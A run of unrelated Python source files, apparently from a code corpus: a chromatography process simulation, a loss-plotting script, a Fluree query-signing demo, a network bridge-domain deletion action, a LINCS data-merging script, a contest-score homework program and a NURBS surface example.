self.log.i_data(self._cycle_tree,
"i_cycle_load_start",
cycle_load_i_start)
self.log.i_data(self._cycle_tree,
"i_cycle_load_step_start",
self._cycle_start_i_list[i])
self.log.i_data(self._cycle_tree,
"i_cycle_load_end",
cycle_load_i_end)
# Calc profiles at column outlet.
c_out_load, c_out_wash, c_out_elution, \
b_out_elution, c_out_regeneration = self._sim_c_out_cycle(
f_in_load[cycle_load_i_start:cycle_load_i_end],
c_in_load[:, cycle_load_i_start:cycle_load_i_end]
)
self.log.d_data(self._cycle_tree,
"c_out_load", c_out_load)
self.log.d_data(self._cycle_tree,
"c_out_wash", c_out_wash)
self.log.d_data(self._cycle_tree,
"c_out_elution", c_out_elution)
self.log.d_data(self._cycle_tree,
"b_out_elution", b_out_elution)
self.log.d_data(self._cycle_tree,
"c_out_regeneration", c_out_regeneration)
# Load recycle.
if self.load_recycle:
# Recycle load during the load step.
i_load_start_rel = self._cycle_start_i_list[i] \
- cycle_load_i_start
c_load_recycle = c_out_load[:, i_load_start_rel:]
c_in_load[:, self._cycle_start_i_list[i]:cycle_load_i_end] = \
c_load_recycle
self.log.i_data(self._cycle_tree, "m_load_recycle",
c_load_recycle.sum(1)
* self._load_f * self._dt)
self.log.d_data(self._cycle_tree, "c_load_recycle",
c_load_recycle)
# Losses during load == bt through 2nd column.
c_loss_bt_2nd_column = c_out_load[:, i_load_start_rel]
self.log.i_data(self._cycle_tree, "m_loss_bt_2nd_column",
c_loss_bt_2nd_column.sum()
* self._dt * self._load_f)
self.log.d_data(self._cycle_tree, "c_loss_bt_2nd_column",
c_loss_bt_2nd_column)
else:
# report losses during load
m_loss_load = c_out_load.sum() * self._dt * self._load_f
self.log.i_data(self._cycle_tree, "m_loss_load", m_loss_load)
# Wash recycle.
if self.wash_recycle:
if previous_c_bt_wash is not None \
and previous_c_bt_wash.size > 0:
# Clip wash recycle duration if needed.
i_wash_duration = min(
self._wash_recycle_i_duration,
self._t.size - self._cycle_start_i_list[i])
# Log losses due to discarding load bt during wash recycle.
s = c_in_load[
:,
self._cycle_start_i_list[i]:self._cycle_start_i_list[i]
+ i_wash_duration]
self.log.i_data(self._cycle_tree,
"m_loss_load_bt_during_wash_recycle",
s.sum() * self._dt * self._load_f)
self.log.d_data(self._cycle_tree,
"c_lost_load_during_wash_recycle", s)
self.log.d_data(self._cycle_tree, "c_wash_recycle",
previous_c_bt_wash[:, :i_wash_duration])
self.log.i_data(
self._cycle_tree, "m_wash_recycle",
previous_c_bt_wash[:, :i_wash_duration].sum(1)
* self._dt * self._wash_f)
# Apply previous wash recycle onto the inlet profile.
s[:] = previous_c_bt_wash[:, :i_wash_duration]
f_in_load[self._cycle_start_i_list[i]:
self._cycle_start_i_list[i]
+ i_wash_duration] = self._wash_f
# Save wash from this cycle to be used during the next cycle.
previous_c_bt_wash = c_out_wash
else:
# Report losses during wash.
if c_out_wash is None:
c_out_wash = _np.zeros(
[len(binding_species),
int(round(self._wash_t / self._dt))])
m_loss_wash = c_out_wash.sum() * self._dt * self._load_f
self.log.i_data(self._cycle_tree, "m_loss_wash", m_loss_wash)
# Elution.
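            # Map the elution peak cut window (relative to the start of the elution step)
            # onto the absolute simulation time axis: elution begins right after the load
            # step (`cycle_load_i_end`) plus the wash duration (`c_out_wash.shape[1]`).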
[i_el_rel_start, i_el_rel_end] = \
_utils.vectors.true_start_and_end(b_out_elution)
i_el_start = min(
self._t.size,
cycle_load_i_end + c_out_wash.shape[1] + i_el_rel_start)
i_el_end = min(
self._t.size,
cycle_load_i_end + c_out_wash.shape[1] + i_el_rel_end)
i_el_rel_end = i_el_rel_start + i_el_end - i_el_start
# Log.
self.log.i_data(self._cycle_tree, "i_elution_start", i_el_start)
self.log.i_data(self._cycle_tree, "i_elution_end", i_el_end)
# Write to global outlet.
self._f[i_el_start:i_el_end] = self._elution_f
self._c[binding_species, i_el_start:i_el_end] = \
c_out_elution[:, i_el_rel_start:i_el_rel_end]
class ACC(AlternatingChromatography):
"""Alternating column chromatography without recycling.
Alternating load-bind-elution twin-column chromatography without
recycling of overloaded or washed out material.
This class offers no dynamics for desorption during wash step.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "ACC".
Notes
-----
For list of attributes refer to :class:`AlternatingChromatography`.
See Also
--------
:class:`AlternatingChromatography`
Examples
--------
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> acc_pro_a = ACC(
... t,
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf,
... uo_id="pro_a_acc",
... gui_title="ProteinA ACC",
... )
>>> acc_pro_a.cv = 100 # mL
>>> # Equilibration step.
>>> acc_pro_a.equilibration_cv = 1.5
>>> # Equilibration flow rate is same as load flow rate.
>>> acc_pro_a.equilibration_f_rel = 1
    >>> # Load 20 CVs.
>>> acc_pro_a.load_cv = 20
>>> # Define wash step.
>>> acc_pro_a.wash_cv = 5
>>> # Elution step.
>>> acc_pro_a.elution_cv = 3
>>> # 1st momentum of elution peak from data from above.
>>> acc_pro_a.elution_peak_position_cv = 1.2
>>> acc_pro_a.elution_peak_cut_start_c_rel_to_peak_max = 0.05
>>> acc_pro_a.elution_peak_cut_end_c_rel_to_peak_max = 0.05
>>> # Regeneration step.
>>> acc_pro_a.regeneration_cv = 1.5
>>> # Inlet flow rate profile.
>>> f_in = _np.ones_like(t) * 15 # mL/min
>>> c_in = _np.ones([1, t.size]) * 2.5 # mg/mL
>>> # Simulate ACC.
>>> f_out, c_out = acc_pro_a.evaluate(f_in, c_in)
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
peak_shape_pdf: _core.PDF,
gui_title: str = "ACC"):
super().__init__(t, uo_id, load_bt, peak_shape_pdf, gui_title)
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Desorbed material during wash step is not supported by ACC.
Raises
------
NotImplementedError
            Raises exception when the function is called.
"""
raise NotImplementedError("Function not implemented in this class.")
class PCC(AlternatingChromatography):
"""Alternating column chromatography with recycling of load.
Alternating load-bind-elution twin-column chromatography with
optional recycling of overloaded or washed out material.
This class offers no dynamics for desorption during wash step.
PCC uses :attr:`load_bt` to determine what parts of the load (and
recycled material) bind to the column. The unbound (not captured)
part is propagated through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
load_recycle_pdf
Propagation of load breakthrough and/or washed out material
through the column.
column_porosity_retentate
Porosity of the column for binding species (protein).
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "PCC".
Notes
-----
For list of additional attributes refer to
:class:`AlternatingChromatography`.
See Also
--------
:class:`AlternatingChromatography`
Examples
--------
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> load_recycle_pdf = _pdf.GaussianFixedDispersion(t, 2 * 2 / 30)
>>> pcc_pro_a = PCC(
... t,
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf,
... load_recycle_pdf=load_recycle_pdf,
... # Porosity of the column for protein.
... column_porosity_retentate=0.64,
... uo_id="pro_a_pcc",
... gui_title="ProteinA PCC",
... )
>>> pcc_pro_a.cv = 100 # mL
>>> # Equilibration step.
>>> pcc_pro_a.equilibration_cv = 1.5
>>> # Equilibration flow rate is same as load flow rate.
>>> pcc_pro_a.equilibration_f_rel = 1
>>> # Load until 70 % breakthrough.
>>> pcc_pro_a.load_c_end_relative_ss = 0.7
    >>> # Automatically prolong the first cycle to reach steady state faster.
>>> pcc_pro_a.load_extend_first_cycle = True
>>> # Define wash step.
>>> # There is no desorption during wash step in this example.
>>> pcc_pro_a.wash_cv = 5
>>> pcc_pro_a.wash_recycle = True
>>> pcc_pro_a.wash_recycle_duration_cv = 2
>>> # Elution step.
>>> pcc_pro_a.elution_cv = 3
>>> # 1st momentum of elution peak from data from above.
>>> pcc_pro_a.elution_peak_position_cv = 1.2
>>> pcc_pro_a.elution_peak_cut_start_c_rel_to_peak_max = 0.05
>>> pcc_pro_a.elution_peak_cut_end_c_rel_to_peak_max = 0.05
>>> # Regeneration step.
>>> pcc_pro_a.regeneration_cv = 1.5
>>> # Inlet flow rate profile.
>>> f_in = _np.ones_like(t) * 15 # mL/min
>>> c_in = _np.ones([1, t.size]) * 2.5 # mg/mL
    >>> # Simulate PCC.
>>> f_out, c_out = pcc_pro_a.evaluate(f_in, c_in) # doctest: +ELLIPSIS
pro_a_pcc: Steady-state concentration is being estimated ...
pro_a_pcc: Steady-state concentration is being estimated ...
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
load_recycle_pdf: _core.PDF,
column_porosity_retentate: float,
peak_shape_pdf: _core.PDF,
gui_title: str = "PCC"):
super().__init__(t, uo_id, load_bt, peak_shape_pdf, gui_title)
self.load_recycle = True
"""Recycle load breakthrough. Default = `True`."""
self.wash_recycle = False
"""Recycle wash. Default = False."""
self.column_porosity_retentate = column_porosity_retentate
"""Column porosity for binding species.
See Also
--------
:class:`PCC`
        Notes
        -----
`column_porosity_retentate` is a mean residence time of the
product (protein) traveling through the column during
non-binding conditions (in CVs).
"""
self.load_recycle_pdf = load_recycle_pdf
"""PDF of wash and/or unbound load traveling through the column.
See Also
--------
:class:`PCC`
"""
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Desorbed material during wash step is not supported by PCC.
Raises
------
NotImplementedError
            Raises exception when the function is called.
"""
raise NotImplementedError("Function not implemented in this class.")
class PCCWithWashDesorption(PCC):
"""Alternating column chromatography with recycling of load.
Alternating load-bind-elution twin-column chromatography with
optional recycling of overloaded or washed out material.
The material desorption during wash step is defined by exponential
half life time
* :attr:`wash_desorption_tail_half_time_cv`
and the amount of desorbable material which is defined by
* :attr:`wash_desorption_desorbable_material_share` or
* :attr:`wash_desorption_desorbable_above_dbc`.
PCC uses :attr:`load_bt` to determine what parts of the load (and
recycled material) bind to the column.
The unbound (not captured) part and desorbed part are propagated
through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
load_recycle_pdf
Propagation of load breakthrough and/or washed out material
through the column.
column_porosity_retentate
Porosity of the column for binding species (protein).
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "PCCWithWashDesorption".
Notes
-----
During wash step, weaker binding isoforms might be desorbed and
recycled. In turn they are again desorbed and recycled during next
cycle and so on; resulting in increasing amount of desorbed material
during wash step (even in steady-state). This is not considered by
this class. Furthermore, it is not a favorable case in terms of RTD
as the weakly bound material propagates from column to column for
many cycles.
For list of additional attributes refer to
:class:`PCC` and :class:`AlternatingChromatography`.
See Also
--------
:class:`PCC`
:class:`AlternatingChromatography`
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
load_recycle_pdf: _core.PDF,
column_porosity_retentate: float,
peak_shape_pdf: _core.PDF,
gui_title: str = "PCCWithWashDesorption"):
super().__init__(t, uo_id, load_bt, load_recycle_pdf,
column_porosity_retentate, peak_shape_pdf, gui_title)
self.load_recycle = True
"""Recycle load breakthrough. Default = `True`."""
self.wash_recycle = True
"""Recycle wash. Default = `True`."""
self.wash_desorption = True
"""Simulate desorption during wash step. Default = `True`."""
self.wash_desorption_tail_half_time_cv = -1
"""Wash desorption rate.
Required if :attr:`wash_desorption` is `True`.
Wash desorption is simulated as exponential decay with half-life
:attr:`wash_desorption_tail_half_time_cv`.
"""
self.wash_desorption_desorbable_material_share = -1
"""Share of material that can be desorbed during wash step.
Wash desorption is simulated as exponential decay. Only part of
adsorbed material is subjected to that exponential decay. That
part can be defined by:
* :attr:`wash_desorption_desorbable_material_share` (this one)
or
* :attr:`wash_desorption_desorbable_above_dbc`.
"""
self.wash_desorption_desorbable_above_dbc = -1
"""Share of material that can be desorbed during wash step.
Share is defined as a share of material loaded onto the column
that exceeds specified `wash_desorption_desorbable_above_dbc`
binding capacity.
Wash desorption is simulated as exponential decay. Only part of
adsorbed material is subjected to that exponential decay. That
part can be defined by:
* :attr:`wash_desorption_desorbable_material_share` (this one)
or
* :attr:`wash_desorption_desorbable_above_dbc`.
"""
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Get conc profile of desorbed material during wash step.
`self.wash_desorption_tail_half_time_cv` needs to be defined.
One of `self.wash_desorption_desorbable_material_share` and
`self.wash_desorption_desorbable_above_dbc` needs to be defined.
Parameters
----------
f_load
Flow rate profile during 'effective load' step.
The step includes wash recycle, load recycle and load step
as a column sees it in a single cycle.
c_bound
Conc profile of captured material.
Returns
-------
ndarray
Conc profile of desorbed material during wash step.
"""
assert self.wash_desorption_tail_half_time_cv > 0
assert self._load_f > 0
assert self._wash_f > 0
assert self._wash_t > 0
assert self._cv > 0
assert self.wash_desorption_desorbable_material_share > 0 \
or self.wash_desorption_desorbable_above_dbc > 0
assert f_load.size == c_bound.shape[1]
assert c_bound.shape[0] \
== self._n_species - len(self.non_binding_species)
m_bound = (c_bound * f_load[_np.newaxis, :]).sum(1)[:, _np.newaxis] \
* self._dt
# Calc share of desorbable material.
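        # Either a fixed share is prescribed directly, or it is derived from a binding
        # capacity threshold: material bound in excess of
        # `wash_desorption_desorbable_above_dbc` * column volume is treated as
        # desorbable, i.e. k = max(0, 1 - dbc * cv / total bound mass).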
k = -1
if self.wash_desorption_desorbable_material_share > 0:
k = self.wash_desorption_desorbable_material_share
if self.wash_desorption_desorbable_above_dbc > 0:
if k > 0:
self.log.w(
f"Share of desorbable material defined twice!!"
f" Using `load_recycle_wash_desorbable_material_share`")
else:
k = max(0,
1 - self.wash_desorption_desorbable_above_dbc
* self._cv / m_bound.sum())
assert 1 >= k >= 0, f"Share of desorbable material {k}" \
f" must be >= 0 and <= 1."
i_wash_duration = int(round(self._wash_t / self._dt))
# Generate exponential tail.
exp_pdf = _pdf.TanksInSeries(self._t[:i_wash_duration],
n_tanks=1,
pdf_id=f"wash_desorption_exp_drop")
exp_pdf.allow_open_end = True
exp_pdf.trim_and_normalize = False
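        # The half-life specified in CVs is converted into the time constant of the
        # single-tank (exponential) PDF: tau = t_half_cv * cv / wash_f / ln(2), so the
        # desorbed concentration halves every `wash_desorption_tail_half_time_cv`
        # column volumes of wash buffer.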
tau = self.wash_desorption_tail_half_time_cv \
* self._cv / self._wash_f / _np.log(2)
exp_pdf.update_pdf(rt_mean=tau)
p = exp_pdf.get_p()[_np.newaxis, :i_wash_duration]
# Scale desorbed material conc due to differences in flow rate.
c_desorbed = m_bound * k * p / self._wash_f
# Pad with zeros if needed.
c_desorbed = _np.pad(c_desorbed,
((0, 0),
(0, i_wash_duration - c_desorbed.shape[1])),
mode="constant")
# Log.
self.log.d_data(self._cycle_tree if hasattr(self, "_cycle_tree")
else self._log_tree,
"p_desorbed",
p)
return c_desorbed
| 2.828125 | 3 |
src/tools/create_graphs_log.py | KatiaJDL/CenterPoly | 0 | 10859 | import matplotlib.pyplot as plt
def main():
with open('log.txt') as f:
lines = f.readlines()
glob_loss = []
hm_l = []
off_l = []
poly_l = []
depth_l = []
glob_loss_val = []
hm_l_val = []
off_l_val = []
poly_l_val = []
depth_l_val = []
for epoch in lines:
m = epoch.split("|")
if m[0].split(':')[1] == ' AP':
glob_loss_val.append(float(m[1][5:-1]))
hm_l_val.append(float(m[2][5:-1]))
off_l_val.append(float(m[3][6:-1]))
poly_l_val.append(float(m[4][7:-1]))
depth_l_val.append(float(m[5][8:-1]))
else:
nb_epoch = int(m[0].split(":")[-1])
glob_loss.append(float(m[1][5:-1]))
hm_l.append(float(m[2][5:-1]))
off_l.append(float(m[3][6:-1]))
poly_l.append(float(m[4][7:-1]))
depth_l.append(float(m[5][8:-1]))
if len(m) > 8 :
glob_loss_val.append(float(m[7][5:-1]))
hm_l_val.append(float(m[8][5:-1]))
off_l_val.append(float(m[9][6:-1]))
poly_l_val.append(float(m[10][7:-1]))
depth_l_val.append(float(m[11][8:-1]))
plt.plot(glob_loss, label = "glob_loss")
plt.plot(hm_l, label = "hm_l")
plt.plot(off_l, label = "off_l")
plt.plot(poly_l, label = "poly_l")
plt.plot(depth_l, label = "depth_l")
plt.legend()
plt.savefig("loss_train.png")
plt.show()
plt.plot(glob_loss_val, label = "glob_loss_val")
plt.plot(hm_l_val, label = "hm_l_val")
plt.plot(off_l_val, label = "off_l_val")
plt.plot(poly_l_val, label = "poly_l_val")
plt.plot(depth_l_val, label = "depth_l_val")
plt.legend()
plt.savefig("loss_valid.png")
plt.show()
if __name__ == '__main__':
main()
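# Hedged sketch (not part of the original script): main() assumes log lines shaped
# roughly like the sample below; the exact field names and widths are assumptions,
# so adjust the slices if the real log.txt differs.
def _example_line_parse():
    sample = "epoch: 3 |loss 1.2345 |hm_l 0.5678 |off_l 0.1234 |poly_l 0.9876 |depth_l 0.4321 |"
    fields = sample.split("|")
    return float(fields[1][5:-1])  # -> 1.2345, mirroring the glob_loss parsing above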
| 2.59375 | 3 |
fluree/query-generate.py | ivankoster/aioflureedb | 4 | 10860 | <filename>fluree/query-generate.py
#!/usr/bin/python3
import json
from aioflureedb.signing import DbSigner
def free_test(signer):
data = {"foo": 42, "bar": "appelvlaai"}
body, headers, uri = signer.sign_query(data)
rval = dict()
rval["body"] = body
rval["headers"] = headers
rval["uri"] = uri
rval = json.dumps(rval, indent=4, sort_keys=True)
print(rval)
privkey = "<KEY>"
address = "1AxKSFQ387AiQUX6CuF3JiBPGwYK5XzA1A"
signer = DbSigner(privkey, address, "something/test")
free_test(signer)
| 2.40625 | 2 |
actions/delete_bridge_domain.py | StackStorm-Exchange/network_essentials | 5 | 10861 | <filename>actions/delete_bridge_domain.py
# Copyright 2016 Brocade Communications Systems, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from ne_base import NosDeviceAction
from ne_base import log_exceptions
import itertools
class DeleteBridgeDomain(NosDeviceAction):
"""
Implements the logic to Delete a BD on SLX devices.
This action achieves the below functionality
1.Delete single/list of bridge domains
"""
def run(self, mgmt_ip, username, password, bridge_domain_id,
bridge_domain_service_type):
"""Run helper methods to implement the desired state.
"""
try:
self.setup_connection(host=mgmt_ip, user=username, passwd=password)
except Exception as e:
self.logger.error(e.message)
sys.exit(-1)
changes = self.switch_operation(bridge_domain_id,
bridge_domain_service_type)
return changes
@log_exceptions
def switch_operation(self, bridge_domain_id, bridge_domain_service_type):
changes = {}
with self.pmgr(conn=self.conn, auth_snmp=self.auth_snmp) as device:
self.logger.info(
'successfully connected to %s to Delete bridge domain',
self.host)
if device.os_type == 'nos' or device.os_type == 'NI':
self.logger.error('Operation is not supported on this device')
raise ValueError('Operation is not supported on this device')
bridge_domain_list = list(itertools.chain.from_iterable(range(int(ranges[0]),
int(ranges[1]) + 1) for ranges in ((el + [el[0]])[:2]
for el in (miniRange.split('-')
for miniRange in bridge_domain_id.split(',')))))
changes['bd_delete'] = self._delete_bridge_domain(device,
bridge_domain_service_type,
bridge_domain_list, bridge_domain_id)
self.logger.info('Closing connection to %s after Deleting '
'bridge domain -- all done!',
self.host)
return changes
def _delete_bridge_domain(self, device, bridge_domain_service_type, bd_list, bd_id):
""" Deleting the bridge-domain """
try:
self.logger.info('Deleting bridge-domain %s', bd_id)
for each_bd in bd_list:
device.interface.bridge_domain(bridge_domain=str(each_bd), delete=True,
bridge_domain_service_type=bridge_domain_service_type)
except (ValueError, KeyError) as e:
self.logger.exception("Deleting bridge-domain failed due to %s"
% (e.message))
raise ValueError("Deleting bridge-domain failed")
return True
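# Hedged sketch (not part of the original action): shows what the itertools
# expression in switch_operation() expands a bridge_domain_id string into,
# e.g. "1-3,5" -> [1, 2, 3, 5].
def _expand_bd_ranges_example(bridge_domain_id="1-3,5"):
    return list(itertools.chain.from_iterable(
        range(int(ranges[0]), int(ranges[1]) + 1)
        for ranges in ((el + [el[0]])[:2]
                       for el in (mini.split('-')
                                  for mini in bridge_domain_id.split(',')))))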
| 2.640625 | 3 |
python/signature.py | IUIDSL/kgap_lincs-idg | 4 | 10862 | #!/usr/bin/env python3
###
# Based on signature.R
###
import sys,os,logging
import numpy as np
import pandas as pd
if __name__=="__main__":
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
    if (len(sys.argv) < 4):
logging.error("3 file args required, LINCS sig info for GSE70138 and GSE92742, and output file.")
sys.exit(1)
fn1 = sys.argv[1] #GSE70138_Broad_LINCS_sig_info_2017-03-06.txt.gz
fn2 = sys.argv[2] #GSE92742_Broad_LINCS_sig_info.txt.gz
ofile = sys.argv[3] #signature.tsv
#
part1 = pd.read_table(fn1, "\t", na_values=["-666", "-666.0"])
logging.info(f"columns: {part1.columns}")
part1 = part1[["sig_id", "pert_id", "pert_iname", "pert_type", "cell_id", "pert_idose", "pert_itime"]]
#
part2 = pd.read_table(fn2, "\t", na_values=["-666", "-666.0"], dtype="str")
part2.pert_time = part2.pert_time.astype(np.int32)
logging.info(f"columns: {part2.columns}")
part2 = part2[["sig_id", "pert_id", "pert_iname", "pert_type", "cell_id", "pert_idose", "pert_itime"]]
#
sign = pd.concat([part1, part2])
sign.drop_duplicates(subset=["sig_id"], keep="first", inplace=True)
sign.to_csv(ofile, "\t", index=False)
| 2.40625 | 2 |
HW3 - Contest Data Base/main.py | 916-Maria-Popescu/Fundamental-of-Programming | 0 | 10863 | <reponame>916-Maria-Popescu/Fundamental-of-Programming
# ASSIGNMENT 3
"""
During a programming contest, each contestant had to solve 3 problems (named P1, P2 and P3).
Afterwards, an evaluation committee graded the solutions to each of the problems using integers between 0 and 10.
The committee needs a program that will allow managing the list of scores and establishing the winners.
Write a program that implements the functionalities exemplified below:
(A) Add the result of a new participant (add, insert)
(B) Modify scores (remove, remove between two postion, replace the score obtained by a certain participant at a
certain problem with other score obtained by other participant)
(C) Display participants whose score has different properties. """
def get(list, position):
""" The function will extract a certain element from a list."""
return list[int(position)]
def set(list, element, position):
""" The functin will set a certain element from a list.
:param list: [ ['2', '4', '8'], ['3', '5', '6'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ]
:param element: ['5', '8', '9']
:param position: 1
    :return: [ ['2', '4', '8'], ['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ]
"""
list.insert(int(position), element)
list.remove(get(list, int(position) + 1))
def make_a_list(sentence):
""" The function will make a list containing the given scores P1, P2 and P3 that are found in the command."""
list_one_score = []
for i in range(1, 4):
list_one_score.append(sentence[i])
return list_one_score
def add_scores(list, sentence):
""" The function will add to the principal list (with all the scores of all the participants) a list with the
scores of just one participant.
"""
list.append(make_a_list(sentence))
def insert_scores(list, sentence, position):
""" The function will insert in a given position to the principal list (with all the scores of all the participants)
a list with the scores of just one participant
"""
list.insert(int(position), make_a_list(sentence))
def remove_one_part(list, position):
""" The function will set the scores of the participant at a given position to 0.
    After this, participant <position> has scores P1 = P2 = P3 = 0. """
nul_element = ['0', '0', '0']
set(list, nul_element, position)
def remove_more_part(list, first_position, last_position):
""" The function will set the scores of all the participants between the first position and last position to 0.
    For all the participants between <first_position> and <last_position>, P1 = P2 = P3 = 0. """
nul_element = ['0', '0', '0']
for i in range(int(first_position), int(last_position) + 1):
set(list, nul_element, i)
def remove(list, cmd):
if len(cmd) == 2: # The command is remove <position>
remove_one_part(list, get(cmd, 1))
elif len(cmd) == 4: # The command is remove <first pos> to <last pos>
remove_more_part(list, get(cmd, 1), get(cmd, 3))
def replace(list, problem, new_score):
""" The function will replace a score obtained by a participant at a specific problem with a new score.
List represents the list with the scores of a participant, where <problem> ( P1/P2/P3 ) will recive a new score
"""
set(list, new_score, int(problem[1]) - 1)
def calc_average(list):
""" The function will calculate the average of all the integers from a list ( it will calculate the sum of al the
integers, and then it will divide the sum by the value of the len of tne list)
:param list: [ '2', '4', '3' ]
:return: 3
"""
result = 0
for i in range(0, len(list)):
result = result + int(get(list, i))
return result / len(list)
def average_score_lesser(list, number):
""" The function will display all the participants with an average score lesser than the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 7
    :return: [['10', '4', '6'], ['9', '3', '2']]
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) < number:
l.append(get(list, i))
return l
def average_score_equal(list, number):
""" The function will display all the participants with an average score equal with the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 8
:return:['7', '8', '9']
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) == number:
l.append(get(list, i))
return l
def average_score_greater(list, number):
""" The function will return a list with all the participants with an average score greater than the given number.
:param list: [['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 7
:return: [['10', '10', '10'], ['7', '8', '9']]
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) > number:
l.append(get(list, i))
return l
def list_sorted(list):
""" The function will return a list with participants sorted in decreasing order of average score
:param list: [['5', '8', '9'], ['10', '4', '6'], ['10', '10', '10'], ['7', '8', '9'], ['10', '2', '9']]
    :return: [['10', '10', '10'], ['7', '8', '9'], ['5', '8', '9'], ['10', '2', '9'], ['10', '4', '6']]
"""
l = []
for i in range(0, len(list)):
get(list, i).insert(0, calc_average(get(list, i)))
l.append(get(list, i))
l.sort(reverse=True)
for i in range(0, len(l)):
get(l, i)
get(l, i).remove(get(get(l, i), 0))
return l
def list(list, cmd):
if len(cmd) == 1:
l = list
elif get(cmd, 1) == 'sorted':
l = list_sorted(list)
elif get(cmd, 1) == '<':
l = average_score_lesser(list, int(get(cmd, 2)))
elif get(cmd, 1) == '=':
l = average_score_equal(list, int(get(cmd, 2)))
elif get(cmd, 1) == '>':
l = average_score_greater(list, int(get(cmd, 2)))
print(l)
def print_menu():
commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>',
'remove <position>', 'remove <start position> to <end position>',
'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>']
print("The possible comands are:")
print(*commands, sep="\n")
def run_menu():
list_participants_scores = [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9'],
['8', '9', '10'], ['10', '2', '9'], ['2', '4', '6'], ['8', '2', '1'], ['0', '8', '4']]
commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>',
'remove <position>', 'remove <start position> to <end position>',
'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>']
while True:
comand = input()
comand_splited = comand.split()
first_word = get(comand_splited, 0)
if first_word == 'add': # The command is add P1, P2, P3
add_scores(list_participants_scores, comand_splited)
elif first_word == 'insert': # The command is insert [P1, P2, P3] at position
insert_scores(list_participants_scores, comand_splited, comand_splited[5])
elif first_word == 'remove':
remove(list_participants_scores, comand_splited)
        elif first_word == 'replace':  # The command is replace <position> P1/P2/P3 with <new score>
replace(get(list_participants_scores, int(get(comand_splited, 1))), get(comand_splited, 2),
(get(comand_splited, 4)))
elif first_word == 'list':
(list(list_participants_scores, comand_splited))
else:
print("Wrong command")
break
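# Hedged usage sketch (not part of the assignment): how the helpers above compose.
# The sample scores are illustrative only; this function is never called automatically.
def demo_session():
    scores = [['5', '8', '9'], ['10', '4', '6']]
    add_scores(scores, ['add', '7', '7', '7'])           # append a new participant
    insert_scores(scores, ['insert', '1', '2', '3'], 1)  # insert ['1', '2', '3'] at position 1
    replace(get(scores, 0), 'P2', '10')                  # participant 0 now has 10 on P2
    return average_score_greater(scores, 5)              # participants with average > 5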
if __name__ == '__main__':
print_menu()
run_menu()
| 4.46875 | 4 |
surface/ex_surface02.py | orbingol/NURBS-Python_Examples | 48 | 10864 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Examples for the NURBS-Python Package
Released under MIT License
Developed by <NAME> (c) 2016-2017
"""
import os
from geomdl import BSpline
from geomdl import utilities
from geomdl import exchange
from geomdl import operations
from geomdl.visualization import VisPlotly
# Fix file path
os.chdir(os.path.dirname(os.path.realpath(__file__)))
# Create a BSpline surface instance
surf = BSpline.Surface()
# Set degrees
surf.degree_u = 3
surf.degree_v = 3
# Set control points
surf.set_ctrlpts(*exchange.import_txt("ex_surface02.cpt", two_dimensional=True))
# Set knot vectors
surf.knotvector_u = utilities.generate_knot_vector(surf.degree_u, 6)
